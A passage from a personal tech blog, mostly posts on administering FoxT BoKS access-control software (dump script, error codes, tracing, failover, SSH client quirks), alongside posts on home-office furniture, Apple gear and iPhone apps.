From time to time one will need a BoKS database dump that includes all the tables, but is limited to one or two specific applications. For example, one could be migrating an application or hostgroup to another BoKS domain. Or one might be performing a security audit on a specific group of servers.

This script will make a dump of all BoKS information relevant to a set of specified servers or host groups. It will strip the password information for all accounts (for obvious security reasons).


Usage of boks_safe_dump

./SafeDump.ksh [-g HOSTGROUP] [-h HOST | -f FILE] [-p] -d DIRECTORY
-g HOSTGROUP	Hostgroup to dump the BoKS information for. Multiple allowed.
-h HOST		Host to dump the BoKS information for. Multiple allowed.
-f FILE		List of hostnames to dump the BoKS information for. 
-p		Disable hiding of account passwords for non-root accounts.
-d DIRECTORY  	Location to store the output files.

Examples:
$PROGNAME -f /tmp/hostlist -d /tmp/BOKSdump
$PROGNAME -g HG_APP1 -g HG_APP3 -d /tmp/BOKSdump
$PROGNAME -g HG_APP1 -h HOST1 -h HOST5 -d /tmp/BOKSdump

Output

The script creates a new directory (indicated with the -d flag) which will contain a number of files called tableN. "N" in this case refers to the relevant table from the BoKS database. The following tables are dumped.

01. Contains all user accounts.
02. Binds access routes to individual users.
06. Contains all host information.
07. Binds host groups to hosts.
09. Binds hosts to host groups (reverse of table 9).
15. Binds IP address to hostname (reverse of table 6).
16. Binds access routes to user classes.
17. Contains all user classes.
31. Contains SSH settings for individual users.
47. Contains all Unix groups.
48. Binds secondary Unix groups to individual users.
49. Binds user accounts to user classes.


Limitations


Download

Download boks_safe_dump.ksh
thomas$ wc boks_safe_dump.ksh
380    1462   10781 boks_safe_dump.ksh

thomas$ cksum boks_safe_dump.ksh
3833439207 10781 boks_safe_dump.ksh

kilala.nl tags: , ,

View or add comments (curr. 0)

Known software issues when working with FoxT BoKS

2009-09-11 08:12:00

Unfortunately not all software plays nicely with BoKS. Some of them have special needs, or need to be configured in a particular manner. This page discusses the known issues. Luckily in most cases all you need to do is tweak one or two settings.


ProFTPd

We have found that recent versions of ProFTPd report FROMHOST IP addresses in the IPv6-IPv4 hybrid mode. This currently (Feb 2010) breaks the BoKS login call because the servc daemon cannot process a FROMHOST formatted as :::ffff:192.168.0.1. You will not see any logging in the BoKS transaction log, but if you bdebug the ftpd process on the agent you'll see that servc returns an ERR-9.

For some reason using the -ipv4 of -4 flags from the command line in order to force ProFTPd into IPv4 mode do not work. Instead you will need to edit proftpd.conf and set the flag "UseIPv6" to "off" (Source).


F-Secure

Connecting to a BoKS server with F-Secure

SSH keys generated by F-Secure are usually in the SSH2 format. Before you can import them on your BoKS server they will need to be converted to OpenSSH format. You cannot simply add them to ~/.ssh/authorized_keys. This conversion is done using the "ssh-keygen" command on your Unix box.

  1. Copy the source user's SSH2 public key (RSA or preferably DSA) to your server.
  2. Login as the destination user.
  3. Run: cd ~/.ssh
  4. Run: /opt/boksm/bin/ssh-keygen -i -f $PATH/TO/PUBKEY >> authorized_keys

You have now converted and added the public key to the authorized_keys file.

Now, if you forego the use of SSH keys and would like to use passwords instead, you will need to force F-Secure SSH to use the "keyboard interactive" authentication method. Per default it will use "password", which will not work properly. Both methods are very similar insofar that "keyboard-interactive" actually includes "password" authentication, but it includes a few additional handshakes that BoKS' OpenSSH needs.

If you're coming from a Unix server you'll need to enable "keyboard-interactive" in either your personal ssh_config file, or in the systemwide file under /etc/ssh/ssh_config.


Connecting to an F-Secure server with BoKS' OpenSSH

Again there's a difference insofar that F-Secure uses SSH2 keys as opposed to the OpenSSH format. Your key will need to be transformed before transfering it to the remote server. The authorized_keys file on the other side will also work differently from what you're used to. The F-Secure authorized_keys file is not a list of keys, but a list of pubkey file names.

  1. Login as the source user.
  2. Run: cd ~/.ssh
  3. Run: /opt/boksm/bin/ssh-keygen -o -f ./id_dsa.pub
  4. Copy the resulting output.
  5. Login to the remote server as the destination user.
  6. Run: cd ~/.ssh
  7. Paste the copied text into a new public key file, like id_dsa.remote.pub.
  8. Edit the authorized_keys file and add a line: key id_dsa.remote.pub

ComForte SFTP

ComForte is an SFTP client used on Tandem servers. It's not a piece of client software like the ones we're used to! It was originally meant for file transfer between Tandem servers. From our experiences it seems to be a daemon running on Tandem that acts as a pass-through for regular FTP traffic, which it then sends through SSH or SSL. It's really rather wonderfully weird :)

We've seen in the past that ComForte SFTP cannot work with keyboard-interactive authentication, since the client software simply does not recognize the method returned by BoKS. Unfortunately to my knowledge BoKS' SSH daemon in turn does not allow the old "password" method to be enabled. Hence with ComForte we must use SSH public key authentication. That's the only way it's going to work.

I have actually never witnessed the configuration process of ComForte, but it seems to work something like this.


Putty and WinSCP

Putty and WinSCP are based on the same piece of simple, elegant software and both should work straight out of the "box". Seeing how they're standalone binaries you won't even have to actually install them in Windows.

If you do discover that your password-based login fails, make sure to check your SSH authentication settings. Just like with F-Secure the "keyboard-interactive" method should be enabled and on the top of your list.

Update 10 Sept 2009:

My colleague Frank vd Bilt has informed me of a semi-bug in a very recent version of Putty. Apparently this version of Putty bombs when used together with the boks_sshd daemon. Even a few "ls -lrt" commands are enough to crash the connection. The error message you'll get is: Disconnected: Received SSH_MSG_CHANNEL_SUCCESS for "winadj@putty.projects.tartarus.org".

You can read the Putty bug report over here.

kilala.nl tags: , ,

View or add comments (curr. 0)

Caveats and gotchas for the FoxT BoKS administrator

2009-09-04 15:19:00

Despite it's long life (it's been with us for over ten years now!), BoKS has a number of caveats, or gotchas that one needs to keep in mind at all times. Some of the points below clearly fall in the "not a bug, but a feature" category, but that doesn't mean you shouldn't be aware of them.

So, here's a list of things that can easily lead to problems.


No protection against duplicate UIDs and GIDs

BoKS will not prevent you from re-assigning the same UID to many different users, nor will it prevent the re-use of the same GID for different groups. You may do this intentionally or accidentally. Either way it's a very good idea to regularly check for duplicate UIDs and GIDs. The thing is, if such a duplication occurs on a server it will have a very hard time figuring out to whom a file or a process belongs. Usually this is left up to the order in which the entries occur in /etc/passwd or /etc/group.

Obviously it's best NOT to use duplicate UIDs and GIDs. However, preventing this will require a centralised database of some sorts that all your security personnel refer to and which is used to lay claim to unused IDs.


No protection against mismatches in UIDs and GIDs

The exact opposite to the previous is also true: BoKS thinks it's perfectly alright for you to use different UIDs for multiple accounts with the same user name. For example, SUN:peter and AIX:peter may have two completely different UIDs. In the case of normal user accounts this may be problematic, but in the case of applicative accounts (like the "oracle" or "sybase" users) this may lead to disaster.

The same goes for Unix groups: it's possible to have multiple groups with the same names, yet different GIDs. See above for the repercussions.


No protection against manual editing of local files

The way BoKS propagates user accounts and groups to a server is by updating the local security files, such as /etc/passwd and /etc/group. Each time a change is made to a user account BoKS will automatically change the contents of these files. However, there are two issues we have run into with regards to the local security files.

  1. Any information not in BoKS is left untouched.
  2. Manual changes to information from BoKS is not corrected.

Re item 1: Usually a number of accounts present after a default OS install are not added to BoKS; think of users like uucp, lp, nobody and sys. These accounts may be needed at one point in time, so BoKS will leave any accounts or groups it does not have knowledge of alone. It will work around this information in the local security files. This leads to ...

Re item 2: Unfortunately this means that it's possible for someone with root access to add accounts to the server that cannot be traced. Of course, assuming that BoKS is up and running the account will not be able to be used because there are no access routes. These manual edits however may completely mess up other accounts that -are- in BoKS.

Say for example that BoKS contains a user "oracle" with UID 1234. If the local passwd file happens to contain another "oracle" user with UID 1200 (which was possibly added by a post-install script) things will go horribly wrong.

Manual changes to accounts or groups that -do- exist in BoKS are rectified by BoKS. However, this only occurs when you make a change to an account, after which BoKS overwrites the "faulty" information.


No warning against account overlap with user names from different host groups

Simply put, BoKS will not issue any warning if there is an overlap of two user accounts made in different host groups. This becomes especially problematic when combined with the second item on this page: no protection against mismatches in UIDs and GIDs.

Let's say we have user accounts SUN:peter (UID 20001) and ORACLE:peter (UID 21003). Now let's say we add SERVERA to both hostgroups SUN and ORACLE. Both "peter" accounts will be added to /etc/passwd with the confusion that is to be expected.

Again, one can prevent a lot of problems by not using different UIDs for the same account. Also, it is a -very- good idea to minimise the amount of copies that exist of one user. I've seen cases where one person had no less than five different accounts, all with the same name but in different host groups. That's easy to mess up!


kilala.nl tags: , ,

View or add comments (curr. 0)

Impressive: the Ars Technica review of OS X 10.6

2009-09-02 09:30:00

Wow... A few days after OS X Snow Leopard's release the Ars Technica review has become available. As always it's a very impressive document, this time ringing in at 23 pages. The great thing about AT's reviews of OS X is that they always go rather in-depth on the technical aspect, this time starting off on page 3 with an analysis of home file system compression (implemented through a few new hacks) is not only saving space, but is also speeding up your computer.

Good stuff! Now all I have to do is find an hour or three to read through it all :D


kilala.nl tags: ,

View or add comments (curr. 0)

BoKS troubleshooting: servc error messages in the log file

2009-08-27 08:49:00

BoKS logs all transactions into $BOKS_var/data/LOG, which then gets rotates to another location of your choosing. Every single request that's handled by BoKS gets logged, detailing who did what, where, when and why. If a transaction fails, the servc process will indicate the error message in the log file. This may not always make clear what is wrong (like the infamous and useless ERR223), but it sure helps you in your troubleshooting.

All of the error messages are listed in the BoKS administration manual. However, since a lot of people also chose not to RTFM I thought I might as well copy the list over here ^_^.

You will also find a more up-to-date list of these messages in $BOKS_var/mess.eng, which acts as a translation file between BoKS errors and plain English.





ERR_SERVC_NEED_MORE 2

Sent by servc when it decides it needs more info from a client NEED=something is set in string sent back).


ERR_SERVC_GAVE_UP 1

Servc cannot get in contact with database.


ERR_SERVC_COMM_ERROR -1

Communication error. Probably wrong nodekey. Set a new nodekey on the machine. Check also that xservc is running by using lsmqueid.


ERR_SERVC_READ_ERROR -2

Read error from database


ERR_SERVC_WRITE_ERROR -3

Write error to database


ERR_SERVC_CORRUPT_BASE -4

Erroneous database


ERR_SERVC_NO_AUTH -5

No authorization


ERR_SERVC_UNKNOWN_HOST -6

Host unknown


ERR_SERVC_NO_SERVC -7

Call to servc failed


ERR_SERVC_UNKNOWN_CLIENT -8

Unknown client type


ERR_SERVC_BAD_ARGS -9

Internal BoKS Manager error. Argument format error.


ERR_SERVC_OLDPSW_CHANGE -100

The password is too old. Must be changed.


ERR_SERVC_PSW_SHORT -101

The password is too short.


ERR_SERVC_PSW_USE11 -102

At least one digit and one letter in the password.


ERR_SERVC_PSW_USE22 -103

At least two digits and two letters in the password.


ERR_SERVC_PSW_ISSAME -104

The password is similar to the username.


ERR_SERVC_PSW_ISUSED -105

The password has already been used.


ERR_SERVC_PSW_INVALID -106

Invalid password


ERR_SERVC_PSW_CHANGED -107

Password changed


ERR_SERVC_NEW_MISMATCH -109

The new passwords don't match


ERR_SERVC_PSW_LOOKALIKE -110

Password does not differ enough from the previous one


ERR_SERVC_NO_USER -200

The user doesn't exist, will not be displayed even if verbose mode is on


ERR_SERVC_WRONG_PSW -201

Wrong password.


ERR_SERVC_OLDPSW -202

The password is too old.


ERR_SERVC_NO_TTY -203

No terminal authorization granted.


ERR_SERVC_NO_TIME -204

Access denied at this hour.


ERR_SERVC_USER_BLOCKED -205

The user is blocked.


ERR_SERVC_TTY_LOCKED -206

The terminal is blocked.


ERR_SERVC_TOO_MANY_TRIES -207

Too many erroneous login attempts.


ERR_SERVC_OLD_USER -208

The username is not valid.


ERR_SERVC_WRONG_SYSPSW -209

Wrong system password


ERR_SERVC_NO_AUTH_INFO -210



ERR_SERVC_STDLOGIN -211

Tells client that standard unix login should be used


ERR_SERVC_MISSING_SYSPSW -212

Missing system password


ERR_SERVC_NO_REMHOST -213

Remote host missing


ERR_SERVC_BAD_REMHOST -214

Calling host not authorized


ERR_SERVC_NO_PIN -215

Missing PIN code or serial number


ERR_SERVC_WRONG_SPIN -216

Wrong password (SPIN)


ERR_SERVC_NO_LOGIN -217

Login not allowed


ERR_SERVC_NO_SUTO -218

SU to user not allowed


ERR_SERVC_GETKEY_EXHAUSTED -217

# SLAN Login not allowed


ERR_SERVC_GETKEY_CANTDEL -218

# SLAN SU to user not allowed


ERR_SERVC_PASSWD_TOO_NEW -219

Not long enough since last password change


ERR_SERVC_TOO_MANY_CONCUR_LOGINS -220

Too many concurrent logins with your name


ERR_SERVC_CERT_REVOKED -221

Certificate revoked


ERR_SERVC_USERPROTO -222

User-level protocol error (currently from dgsadasp)


ERR_SERVC_AUTH_FAIL -223

Authentication failed (currently from bosas)

kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: tracing the BoKS internals

2009-08-27 08:22:00

FoxT provides us with a number of very useful tools to aid us in troubleshooting BoKS issues. Among others we will frequently use the boksauth and bdebug commands. Bdebug in this case refers to the tracing tool that this article will focus on.

Usually we will want to run a trace when BoKS is doing something that we don't expect. For example:

In each case you will need to determine which BoKS processes are part of the problem. For example:

Before we begin, let me warn you: debug trace log files can grow pretty vast pretty fast! Make sure that you turn on the trace only right before you're ready to use the faulty part of BoKS and also be sure to stop the trace immediately once you're done.

Debugging login issues

In the case of users getting denied access, troubleshooting got a lot easier once we learnt to use the boksauth command. Boksauth allows you to simulate a login request by a user, without actually having access to the account, the password or the source host. For example:

BoKS > boksauth -Oresults -r'ssh:192.168.0.128->SERVERA' -c FUNC=auth PSW="vljwvHlx3zS35" \
FROMHOST=192.168.0.128 TOHOST=SERVERA TOUSER=patrick ERRMSG=

The command above will test a login from 192.168.0.128, using SSH to user patrick@SERVERA. Assuming that you're testing a failing login, the output will include something like "ERRMSG=No terminal authorization granted."

In order to see what's actually going wrong you will need to start a debug trace on the servc process on the same master/replica where you run the boksauth command. This is done by entering:

BoKS > bdebug -x9 -f /tmp/servc.trace servc

Repeat the boksauth command and then immediately afterwards run the following command to turn off the trace again:

BoKS > bdebug -x0 servc

The file /tmp/servc.trace will now contain the debug output for all transactions parsed in the past few seconds, including the failed simulated login you did with boksauth. Debug output is rather lengthy and difficult to read so either you'll need half an hour to dig through it, or you can send it to FoxT's tech support department so they can explain it for you.

Debugging other issues

As I mentioned you can use bdebug to run traces on any BoKS process you can think of. In each case you'll use "bdebug -x9" to turn debugging on and "bdebug -x0" to turn it off again. In order to properly troubleshoot your issues you'll need to decided which processes to trace and then, with the trace running, try to replicate the problem.

In the case of replication issues you'll:

If a client is not receiving updates, you'll:


kilala.nl tags: , ,

View or add comments (curr. 0)

FoxT BoKS international users group

2009-08-27 08:20:00

The Fox Tech logo

Users and administrators of the BoKS Access Control software seem to be spread out quite thinly across the globe. Most companies that employ BoKS are quite large, but there's only a few in each country that actually do so. So far, to my knowledge, the Netherlands only has one multinational using BoKS with two others considering an implementation of their own.

Since there isn't very much BoKS information available on the web I thought I'd create a users group on LinkedIn. LI.com is a great site for maintaining your professional network and for keeping in touch with colleagues both old and new. Hence it's also a nice and easy way to set up a discussion board for professionals.

I'm very curious to see if we can entice BoKS admins from countries other than the Netherlands to join. It'd be great if we could set up discussions between users across the globe. Maybe we could even coordinate feature requests and bug reports to lighten the load on FoxT and to make sure the really important requests get handled first.

Spreading information about BoKS on the web

Slowly but surely we are working on making more information about BoKS available through the Internet. Friends and colleagues have started writing tutorials and case studies, which (by providence of Google) should turn up when people search for Information.

Below you'll find a list of the efforts I've tracked down so far.


kilala.nl tags: , ,

View or add comments (curr. 1)

Integrating FoxT BoKS in Solaris Service Management Facility (SMF)

2009-08-18 12:37:00

As we all know BoKS is available for a multitude of flavors of Unix. Aside from a number of Linux distributions, it also runs on AIX, HP-UX, Solaris and even on Windows. Because of this diverse choice of platforms FoxT is of course forced to make design choices that point towards the lowest common denominator.

In some cases these design choices lead to undesirable situations, which one will need to work around. One such case is Solaris 10, which chooses to forgo the ancient Unix staple of /etc/inetd.conf, /etc/init.d/, /etc/rc?.d/ and /etc/inittab. Instead, Sun Microsystems has chosen to create their own service management facility, aptly called Solaris SMF.

In Solaris 10 the SMF software is used to manage the startup and shutdown sequences of the server, as well as the current state of many running applications. For example, where one would originally type "/etc/init.d/openssh start" one now enters "svcadm enable svc:/network/service:ssh".

BoKS however still relies on the old fashioned scripts for its startup and shutdown as it can expect to find these on all Unixen. However, during the execution of one of our projects Unixerius have decided to make a patch for BoKS that will allow the software to work reliably from SMF.


Patching BoKS for use with Solaris SMF

In order to get BoKS to work with SMF we'll need to make a number of changes to both BoKS and the Solaris operating system. We are currently not aiming for a full switch from /etc/rc3.d and boksinit to SMF, but instead opt to only include the minimum into SMF.

The way we see it, we'll need to make the following changes:

*: And boksinit.replica and boksinit.master.

The above should allow us to stop and start BoKS independently of the BoKS SSH daemon. If you wouldn't do this SMF would kill boks_sshd along with the rest of BoKS. It will also allow us to use "Boot -k" and "Boot", which will then interact with SMF instead of just killing PIDs from a list.

Please give us a few weeks to work out this patch. Of course we'll post news both over here and on the Unixerius website once the work is done.


Further resources about SMF


kilala.nl tags: , ,

View or add comments (curr. 0)

My new home office

2009-08-08 09:59:00

My new desk and chair.

Yesterday I finally took delivery of the furniture for my home office in the attic. After fighting the Madeko logistics department for two days the truck finally showed up at 1700, Friday afternoon =_=

Putting my annoyance with the logistics team aside, I'm quite happy with Madeko. They have a huge range of products and their drivers/techies/salespeople are very friendly. A few weeks ago I spent an hour on a Saturday morning going through their warehouse in Maarsbergen and it was a blast. Arjan was a great fellow and really helped me out in my choice of a desk.

He finally steered me towards the desk shown above, a Gispen Work desk which is height adjustable (with a crank) and which comes with a custom made desktop. The top is not made out of MDF like most desks are these days, but instead it consists of eighteen layers of plywood (multiplex in dutch). This makes the top bloody heavy (over forty kilos), but it's also sturdy and I can always sand it down and re-lacquer it if I feel like it.

The frame itself is rather oddly shaped, but is pretty nifty. It's actually not the legs that extend when you crank the desk, but the desktop itself is lifted on a jack-like mechanism. Very nifty and with no wobble at all.

The chair's a Comforto System 70, which is the same kind of chair we use at $CLIENT. It's been reupholstered and restored and, while a little bit wobbly, it's a good chair in the ergo department.

Both pieces of furniture are secondhand, the desk setting me back 150 euros and the chair 250. With delivery and taxes I ended up a bit over five hundred euros. That's a sight better than the near seven hundred euros I originally paid for the GDB Vegas desk.

Now, things left to do:

* Get rubber wheels for the chair so I don't damage the floor.

* Cannibalize a small coffee table to make a shelf for my Macbook.

* Get a Samsung 24" screen with a Flextronic LX swivel arm.

Putting it all together I actually stayed almost four hundred euros under budget!


kilala.nl tags: , ,

View or add comments (curr. 3)

Disaster recovery (fail over) of the BoKS infrastructure

2009-08-04 22:01:00

The BoKS infrastructure is pretty much rock solid and will not let you down under normal circumstances. However, "normal" doesn't always happen so it's good to prepare for a disaster. What happens if you lose a replica or two? What happens if the BoKS master server itself is dead? It pays to come prepared!


Adding new BoKS replica servers

Luckily BoKS replica servers are pretty expendable. One needs at least one replica server per physical location, though it pays to have more than one. Moreover you may want to have a replica per section of your network.

By having a good amount of replica servers you won't be caught off guard by a network failure. Having a set of replicas per data center ensures that all your hosts will remain funcional, even if your WAN connections die. And having a replica per network section will allow you to keep operating, despite failure of backbone routers and such.

Should you ever feel the need to add more replica servers, then you can take the following step to create new ones. However, keep in mind that you'll need to be able to communicate with the master server, so this won't do you any good if the network's already dead.

First, modify the host record of your targeted client system through the BoKS GUI. Change the host type from UNIXBOKSHOST to BOKSREPLICA. Then, on the client system perform the following commands.

# /opt/boksm/sbin/boksadm -S

BoKS> vi $BOKS_etc/ENV      #set SHM_SIZE to 16000

BoKS> convert -v server
Stopping daemons...
Setting BOKSINIT=server in ENV file...
Restarting daemons...
Conversion from client to replica done.

BoKS> Boot -k

BoKS> Boot

Finally, also restart the BoKS master software. Running "boksdiag list" should now show the new replica server, which is probably still loading its copy of the database.


Performing a BoKS master fail-over

Without a working master server the BoKS infrastructure will keep on functioning. However, it is impossible to make any changes to the database and thus it's a good idea to restore your master as soon as possible. It's a good idea to promote a replica to master status if you think it'll take you more than a few hours (a day?) to fix the server.

Log in to your chosen replica and perform the following actions. Start off by checking the boks_errlog file to see if the replica itself isn't broken.

$ /opt/boksm/sbin/boksadm -S

BoKS> tail -30 /var/opt/boksm/boks_errlog
...
...

BoKS> convert –v master

Stopping daemons...
Setting BOKSINIT=master in ENV file...
Restarting daemons...
Conversion from replica to master done.

BoKS> boksdiag list
SERVER SINCE LAST SINCE LAST SINCE LAST COUNT LAST
REPHOST5 00:49 523D 5:19:20 04:49 1853521 OK
REPHOST4 00:49 136D 22:21:35 04:49 526392 OK
REPHOST3 00:49 04:50 726768 OK
REPHOST2 00:49 107D 5:05:33 04:49 425231 OK
REPHOST 02:59 02:13 11:44 148342 DOWN

BoKS> boksdiag sequence
...
T7 13678d 8:33:46 5053 (5053)
...
T9 13178d 11:05:23 7919 (7919)
...
T15 13178d 11:03:16 1865 (1865)
...

Now log in to the remaining replica servers and compare the output of the "boksdiag sequence" commands. Alternatively you can run the check_boks_replication script to automate the process. Either way, none of the replicas should either be ahead of the new master, nor should it lag too far behind. If you do find that the replication is broken we'll need to proceed with troubleshooting.


Rolling back after the BoKS master fail-over

Assuming that you will not be using your new master server permanently you will want to go back to your original BoKS master at some point in time. Let's assume that you've repaired whatever damage there was and that the system is now ready to resume its duty.

It's crucial that the original master be converted to a client system before booting it up fully. Perform the following in single user mode.

$ /opt/boksm/sbin/boksadm -S

BoKS> convert –v client
Stopping daemons...
Setting BOKSINIT=client in ENV file...
Restarting daemons...
Conversion from master to client done.

BoKS> cd /var/opt/boksm/data

BoKS> rm *.dat

BoKS> rm sequence

You may now boot the original master server into multi-user mode and let it rejoin the BoKS infrastructure as a client. Afterwards, convert it into a replica server per the instructions in the first paragraph of this page.

Once the original master server has become a fully functioning replica server you may start thinking about dismantling the temporary master. This process will actually be quite similar to what we've done before. Basically you:

  1. Reboot the temporary master into single user mode.
  2. Convert the temporary master into a client (see above).
  3. Convert the original master server back into a master (see second paragraph).
  4. Boot the temporary box into multi-user mode.
  5. Convert the temporary box back into a replica.

kilala.nl tags: , ,

View or add comments (curr. 0)

Working from home: scripting, BoKS and virtualization

2009-07-29 08:57:00

Given the fact that Marli can't currently provide the required care to our kid (due to her burnt hand), I've been working from home the past two days. With any luck Mar's hand will be healed by tonight and I'll get back to the office. In the mean time I've been scripting my ass off, getting more things done in two days than I usually do in a week. "I'm on a roll", as they say.

I had a list of five or six scripts that I wanted to write that work with FoxT's BoKS security software. Most of them are monitoring scripts that work with Tivoli (Nagios conversions coming up soon), with two sysadmin scripts to complete the set.

In order to test these scripts I'm setting up a test network, all with thanks to the wonders of Parallels Desktop. I admit that the 4GB of RAM in my Macbook is a bit anemic for running two Linux servers and a Solaris server, but it'll do for now. Maybe I ought to get a proper Powermac MacPro again. :)

Installing Solaris x86 in Parallels took a few tries, but I finally got it working, thanks to some tips found on the web.

* Give it a minimum of 512 MB RAM

* A small hard drive is fine, but don't set it to autoextend.

* Set 800x600 and 1024x768 as native display resolutions.

* Don't use the graphical/X11 installer, but go the console route.

EDIT:

This tutorial by Farhan Mashraqi was indispensable in getting the Realtek emulated network card to work under Solaris.


kilala.nl tags: , ,

View or add comments (curr. 0)

Wow, that new Airport Extreme is really something!

2009-06-30 17:39:00

As described earlier I got one of those new Airport Extreme base stations for our new IT setup at home. I have to say, it's really something!

Of course the setup was a snap and I easily set it up like our old AExpress. Connecting to the new 5GHz network was a snap as well, and the old Kilala network's still there for my iPhone and Kaijuu's laptop. But what's astonishing is the range of the new 5 gig net! I'm typing this up in the attic, where (according to Speedtest.net I'm getting a 12.2 / 1.7 Mbps connection. One floor down in the bedroom we're at 27.3 / 2.5, just like downstairs. That's pretty damn good! The old 2.4 Ghz net would not have reached up into the attic.

Now all I need to do is worm the cat5e cable through the house, to get full 1 Gbps upstairs for backups, file sharing and printing.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Open Coffee networking event in Almere

2009-05-19 21:44:00

The Open Coffee Almere logo.

Taking a page out of the good book on Open Coffee networking events, I've decided to start one for Almere. Following the example of the original Open Coffee event, we'll gather every month (same Bat-time, same Bat-channel!) to meet new people over a cup of hot Java.

To get things going I've opened the Open Coffee Almere group at LinkedIn.com. With a bit of luck we'll get a few dozen members soon.

To make the group stand out a little bit I've worked with InkScape for a few hours. By combining the Almere coat of arms with the common logo for most Dutch OC groups I think I've managed to create something unique. Besides, I didn't feel like re-using the same low-res image all the other groups use ;) By making the logo a vector image I've guaranteed that we can resize it to -any- size without loss of quality.

EDIT:

I've set up a simple Wordpress site at opencoffeealmere.nl to act as a face to the masses.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Syncing your Siemens SL78H with Mac OS X

2009-03-06 06:01:00

The Siemens SL78H DECT cordless phone sports a very nice mobile-like feature set, including Bluetooth vCard syncing. Unfortunately this doesn't work with Mac OS X out of the box, but there's a work around.

Before you start off, pair your Mac and the SL78H in the usual fashion. Turn Bluetooth on for both devices, then on the Siemens go to Bluetooth > Find device. Go through the usual song and dance. Be sure to set your Mac to be discoverable.

Here's how you go from there.

1. In Address Book, make a new list of the contacts that you want on the phone.

2. Export this list of contacts as a group vCard (File > Export).

3. Make a backup of your Address Book (File > Export > Archive).

4. Remove all of your contacts. Then import the group vCard (File > Import).

Your Address Book is now empty, except for the contacts you want to transfer to the SL78H.

5. Download vCard blaster for Mac OS X.

6. Run vCard blaster and choose to send one vCard at a time, WITH acknowledgement.

7. Click Go and acknowledge each transfer.

You're now set and all your contacts are on the SL78H. You can turn Bluetooth off again.

8. Restore your Address Book from its backup (File > Import > Archive).


kilala.nl tags: ,

View or add comments (curr. 7)

This is frustrating! Finding a Firewire extension cord

2009-03-03 10:36:00

$DEITY! All I'm trying to do is to hook up my Lacie Firewire speakers to my Powermac. The Lacie's come with a non-detachable 1m FW cable, while my Mac is about 3m away.

This should of course be easily fixable with an extension cord or a hub. Right? Were it not that this is not USB, which is the VHS to Firewire's Betamax and thus there is next to nearly nothing usable out there for Firewire. Oh sure, Belkin has a USB/FW hub, but it rings in around 40 euros. And there's -one- extension cord available in the Netherlands, but it's a whopping 27 euros o_O

I'll go trawl eBay/Marktplaats now... See what I can come up with on the secondhand market. *sigh*

EDIT: Thank $DEITY for Kleinspul.nl who have a 6P F-F adapter which will let me hook up two cables. At about five bob apiece, that's pretty good...


kilala.nl tags: , , ,

View or add comments (curr. 3)

Using emoji on the iPhone

2009-02-04 08:38:00

A screenshot of the emoji keyboard

Hooray for Japanese silliness! For years now (I've no clue when this got started) emoji have been a staple of Japanese cellphone culture. Combining cuteness with typing efficiency, the Japanese implemented a system involving smileys and dozens of other icons in their keitai. One can cut down on the amount of words tremendously by simply stringing together a few of these symbols to form a semi-sentence.

Or as Ars Technica member Palad1 puts it:

I'm 0.59 GBP poorer but about 12.2315% hipper now that I can text the wife ":metro: :home: :cat: :sushi: :hotmonkeysex: ?". Thanks Ars, for helping me in my eternal quest for marital nooky!

There are multiple ways of getting emoji to work on your iPhone, though all of them require firmware version 2.2 or higher. Unfortunately the emoji keyboard is invisible per default outside Japan, but using apps like Typing Genius - Get emoji ($0.99) one can enable the option in System Preferences.


kilala.nl tags: , , ,

View or add comments (curr. 9)

Some of my favourite iPhone apps

2009-01-07 18:07:00

A few logos

I've had my iPhone for a few months now and can seriously say that I do not ever want to part with it! To me it's a phone, web browser and games platform in one, with a big bunch of very handy applications thrown in. I've got about fifty apps loaded, but there's only a few that see daily use. I thought I'd highlight them over here, because they deserve some extra credit :)

In no particular order, they are (where possible links go to dev site, not appstore):

* NetNewsWire, all my RSS feeds on the go.

* Trein, trip advisor the dutch railways.

* TapTap Revenge, a free rhythm game.

* WhiteNoise, loads of soothing background sounds.

* Maps, Google Maps on the go.

* BeeTagg, clean and fast QR Code reader.

* SHOUTcast, >25.000 Internet radio stations on 3G.

* Kana, training me on kana.

* YouTube, duh :p

* World Subway Maps, photos of subway maps (like Tokyo).

The past few weeks my iPhone has really proven itself as my awesome assistant at home, at the office and on the road. I never liked full fledged PDAs or "smart phones", but for me iPhone is the perfect mix of "dumb and smart phone" :)


kilala.nl tags: , , ,

View or add comments (curr. 4)

Janus Privacy Adapter

2008-12-23 22:15:00

The JanusPA prototype

Via Clint:

The janus team have published a preview of their new privacy adapter. it's a small two port router. you just plug it in-line between your computer/switch and your internet connection. it will then anonymize all of you traffic via the tor network. you can also use it with openvpn.

I'd never heard of JanusVM before, but it seems that the team's been working on security and privacy software for Windows and Linux for quite a while now. This little piece of hardware looks very useful for when you're working in an untrusted network!

JanusPA sneak peek.


kilala.nl tags: , ,

View or add comments (curr. 0)

Updating your Parrot carkit using Parallels Desktop

2008-11-28 18:03:00

I've been using my Parrot CK3100 bluetooth carkit to my utmost satisfaction for a few years now. It worked a charm with my old Nokia handset. Once I switched to my iPhone I started having weird problems though. After half an hour driving, or maybe after a phone call or two, I wouldn't get any audio on the carkit anymore. I could make outgoing calls or receive incoming calls, but there simply wouldn't be any sound. Then after a few seconds the radio would cut back to the CD or whatever I was listening to.

I decided that the best course of action would be to re-flash my CK3100 with a newer software version. Lo and behold, the release notes for version 4.18b of the Parrot OS make specific notice of the known iPhone bug in version 4.17! Goodie!

Unfortunately Parrot's updating software is only available for the Windows platform and thus, as a fervent Mac addict, I had to find a solution. Luckily I still had a Windows XP disk image for Parallels, which was working nicely. In order to get Bluetooth working under Parallels, there's a few hoops to jump through. Below you'll find the quick & dirty guide to updating your Parrot using Windows in Parallels under Mac OS X.

1. Make sure your Windows install in Parallels is working nicely. Boot it up.

2. Take the installation DVD that came with your Mac and insert it into the drive. Connect Parallels to the drive so you can read the DVD. This automatically opens an install windows which you can close.

3. Browse the contents of the DVD, going into "Boot Camp -> Drivers -> Apple".

4. Run these two installers using an admin account: AppleBluetoothInstaller and AppleBluetoothEnablerInstaller.

5. Reboot Windows. It will now automatically detect the Bluetooth hardware.

6. Go to the Parrot downloads site and download the Parrot software update tool.

7. Go the the Parrot manuals site and read the upgrading manual for your model Parrot.

8. You'll need to install the software updater under Windows. The default location is under C:Program FilesParrot Software Update Tool.

9. Run the ParrotFlashWiz application as an admin user. You'll need to download new firmware versions into the prog-files directory and this requires admin rights.

10. Take it from there using the manual from step 7.

Presto!


kilala.nl tags: , , ,

View or add comments (curr. 1)

Finally: BoKS has a logo!

2008-11-22 20:37:00

The new BoKS logo

